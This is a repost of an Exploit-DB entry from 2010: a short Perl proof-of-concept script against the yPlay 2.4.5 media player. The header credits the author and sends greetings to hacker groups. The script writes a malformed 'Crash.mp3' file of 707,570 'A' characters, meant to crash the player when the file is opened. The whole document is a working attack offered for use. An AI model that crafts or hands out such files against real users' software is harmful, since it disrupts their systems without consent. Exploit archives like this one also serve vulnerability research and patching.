yPlay 2.4.5 – Denial of Service

  • 作者: MOHAMED ABDI
    日期: 2010-10-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15356/
  • #Exploit Title : yPlay Denial of Service Vulnerability
    #Software : yPlay 
    #Software link : http://www.spacejock.m6.net/files/yPlayFull.exe
    #Autor : ABDI MOHAMED
    #Email : abdimohamed@hotmail.fr
    #greetz: net_own3r , sadhacker , net-decrypt3r , xa7m3d , the commander , mr.fearfactor and all tunisian hackers
    #Software version : 2.4.5
    #Tested on : Win7 Ultimate fr + win xp sp 2
    my $file="Crash.mp3";
    my $junk="A"x707570;
    open(POOH,">$file");
    print POOH $junk;
    print "[+]Malicious File created successfully!\n";
    print "[+]Discovered and Coded by abdimohamed \n";
    close(POOH);